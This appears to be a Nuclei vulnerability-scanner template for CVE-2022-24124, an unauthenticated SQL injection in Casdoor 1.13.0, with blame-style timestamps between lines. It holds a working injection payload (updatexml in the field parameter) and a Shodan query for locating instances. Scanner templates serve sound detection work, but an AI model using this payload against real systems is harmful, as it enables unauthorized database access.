2022-02-28 13:53:30 +00:00
id : CVE-2022-24124
info :
2022-03-08 15:54:16 +00:00
name : Casdoor 1.13.0 - Unauthenticated SQL Injection
2022-02-28 13:53:30 +00:00
author : cckuailong
severity : high
2022-03-08 17:38:46 +00:00
description : Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations.
2022-02-28 13:53:30 +00:00
reference :
2022-03-08 15:54:16 +00:00
- https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html
2022-02-28 13:53:30 +00:00
- https://www.exploit-db.com/exploits/50792
- https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget
2022-02-28 22:01:40 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-24124
2023-07-11 19:49:27 +00:00
- https://github.com/casdoor/casdoor/compare/v1.13.0...v1.13.1
2022-02-28 13:53:30 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2022-24124
cwe-id : CWE-89
2023-08-31 11:46:18 +00:00
epss-score : 0.00846
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.80026
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
product : "casdoor"
2022-04-22 10:38:41 +00:00
shodan-query : http.title:"Casdoor"
2023-07-11 19:49:27 +00:00
vendor : casbin
2022-08-27 04:41:18 +00:00
tags : sqli,unauth,packetstorm,edb,cve,cve2022,casdoor
2022-02-28 13:53:30 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-28 13:53:30 +00:00
- method : GET
path :
- "{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"
matchers-condition : and
matchers :
- type : regex
part : body
regex :
- "XPATH syntax error.*'"
2022-02-28 22:01:40 +00:00
- "casdoor"
condition : and
- type : status
status :
- 200